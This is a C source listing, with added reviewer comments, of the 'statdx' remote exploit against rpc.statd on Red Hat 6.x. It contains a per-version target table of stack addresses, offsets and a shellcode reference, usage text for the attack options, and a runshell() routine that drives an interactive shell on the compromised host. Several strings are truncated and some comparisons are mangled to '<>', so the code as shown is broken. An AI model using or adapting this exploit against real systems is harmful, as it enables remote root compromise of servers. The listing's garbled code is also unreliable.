/* Result code carried in sm_stat_res.res_stat (see xdr_res() below for how it
 * is put on the wire as an XDR enum). The names suggest success/failure of a
 * status-monitor request; nothing in this listing interprets the values. */
enum res
{
stat_succ,
stat_fail
};
/* SM_NAME argument: a single string. xdr_sm_name() below encodes/decodes it
 * with SM_MAXSTRLEN as the length bound, so the decoder never allocates more
 * than that for mon_name. */
struct sm_name
{
char *mon_name;	/* owned by the XDR layer when decoded; freed via xdr_free */
};
/* Reply to an SM request: a result code followed by an int state.
 * xdr_sm_stat_res() below fixes the wire order as res_stat, then state. */
struct sm_stat_res
{
enum res res_stat;	/* encoded via xdr_res() */
int state;		/* encoded via xdr_int() */
};
/* One row of the hard-coded target table (types[] below).
 * `type` and `desc` are what usage() prints for the -d option; `code` is
 * set to the `shellcode` symbol in every row, a symbol referenced but not
 * defined in this listing. The remaining numeric fields are not documented
 * here — NOTE(review): usage() describes options -a/-l/-o/-w in matching
 * terms, so presumably they are per-target defaults for those; confirm
 * against the option parser, which is outside this listing. */
struct type
{
int type;	/* numeric id selected with -d */
char *desc;	/* human-readable target name printed by usage() */
char *code;
u_long bufpos;
int buflen;
int offset;
int wipe;
};
/* Hard-coded target table. All three real rows carry identical numeric
 * parameters and differ only in `type` and `desc`. The final all-zero row
 * (desc == NULL) is the sentinel that the loop in usage() stops at, so any
 * row added later must go before it. `shellcode` is not defined in this
 * listing. */
struct type types[] =
{
{0, "Redhat 6.2 (nfs-utils-0.1.6-2)", shellcode, 0xbffff314, 1024, 600,
9},
{1, "Redhat 6.1 (knfsd-1.4.7-7)", shellcode, 0xbffff314, 1024, 600, 9},
{2, "Redhat 6.0 (knfsd-1.2.2-4)", shellcode, 0xbffff314, 1024, 600, 9},
{0, NULL, NULL, 0, 0, 0, 0}	/* sentinel: desc == NULL terminates the table */
};
/*
 * XDR routine for struct sm_name: serialises or deserialises the single
 * mon_name string, bounded by SM_MAXSTRLEN.
 *
 * @param xdrs  XDR stream (direction is taken from the stream itself).
 * @param objp  record whose mon_name is read or written.
 * @return TRUE on success, FALSE if xdr_string() fails.
 */
bool_t
xdr_sm_name(XDR *xdrs, struct sm_name *objp)
{
	bool_t ok = xdr_string(xdrs, &objp->mon_name, SM_MAXSTRLEN);

	return ok ? TRUE : FALSE;
}
/*
 * XDR routine for enum res: the value travels as a plain XDR enum.
 *
 * @param xdrs  XDR stream.
 * @param objp  enum to encode from or decode into.
 * @return TRUE on success, FALSE if xdr_enum() fails.
 */
bool_t
xdr_res(XDR *xdrs, enum res *objp)
{
	enum_t *raw = (enum_t *)objp;	/* XDR enums are carried as enum_t */

	return xdr_enum(xdrs, raw) ? TRUE : FALSE;
}
/*
 * XDR routine for struct sm_stat_res. Wire order is res_stat first, then
 * state; the && short-circuits so a failed res_stat stops before state is
 * touched, exactly as the two-step check does.
 *
 * @param xdrs  XDR stream.
 * @param objp  record to encode from or decode into.
 * @return TRUE if both fields were processed, FALSE on the first failure.
 */
bool_t
xdr_sm_stat_res(XDR *xdrs, struct sm_stat_res *objp)
{
	bool_t both = xdr_res(xdrs, &objp->res_stat)
	           && xdr_int(xdrs, &objp->state);

	return both ? TRUE : FALSE;
}
/*
 * Print the command-line synopsis and every entry of types[] (up to the
 * desc == NULL sentinel) to stderr, then terminate with EXIT_FAILURE.
 * Never returns.
 *
 * NOTE(review): several fprintf format strings below are cut off in this
 * listing (no closing quote or newline), so the function as shown does not
 * compile; the missing text is not recoverable from this page and has been
 * left as-is rather than guessed.
 *
 * @param app  program name substituted into the synopsis line (presumably
 *             argv[0]; the caller is not in this listing).
 */
void
usage(char *app)
{
int i;
fprintf(stderr, "statdx by ron1n
fprintf(stderr, "Usage: %s [-t] [-p port] [-a addr] [-l len]\n", app);
fprintf(stderr, "\t[-o offset] [-w num] [-s secs] [-d type]
fprintf(stderr, "-t\tattack a tcp dispatcher [udp]\n");
fprintf(stderr, "-p\trpc.statd serves requests on
fprintf(stderr, "-a\tthe stack address of the buffer is
fprintf(stderr, "-l\tthe length of the buffer is
fprintf(stderr, "-o\tthe offset to return to is
fprintf(stderr, "-w\tthe number of dwords to wipe is
fprintf(stderr, "-s\tset timeout in seconds to
fprintf(stderr, "-d\tuse a hardcoded
fprintf(stderr, "Available types:\n");
/* types[] ends with a row whose desc is NULL; that row is the loop bound. */
for(i = 0; types[i].desc; i++)
fprintf(stderr, "%d\t%s\n", types[i].type, types[i].desc);
exit(EXIT_FAILURE);
}
void
runshell(int sockd)
{
char buff[1024];
int fmax, ret;
fd_set fds;
fmax = max(fileno(stdin), sockd) + 1;
send(sockd, "cd /; ls -alF; id;\n", 19, 0);
for(;;)
{
FD_ZERO(&fds);
FD_SET(fileno(stdin), &fds);
FD_SET(sockd, &fds);
if(select(fmax, &fds, NULL, NULL, NULL) <>
{
perror("select()");
exit(EXIT_FAILURE);
}
if(FD_ISSET(sockd, &fds))
{
bzero(buff, sizeof buff);
if((ret = recv(sockd, buff, sizeof buff, 0)) <>
{
perror("recv()");
exit(EXIT_FAILURE);
}
if(!ret)
{
fprintf(stderr, "Connection closed\n");
exit(EXIT_FAILURE);
}
write(fileno(stdout), buff, ret);
}
if(FD_ISSET(fileno(stdin), &fds))
{
bzero(buff, sizeof buff);
ret = read(fileno(stdin), buff, sizeof buff);
errno = 0;
if(send(sockd, buff, ret, 0) != ret)
{
if(errno) perror("send()");
else fprintf(stderr, "Transmission loss\n");
exit(EXIT_FAILURE);
}
}
}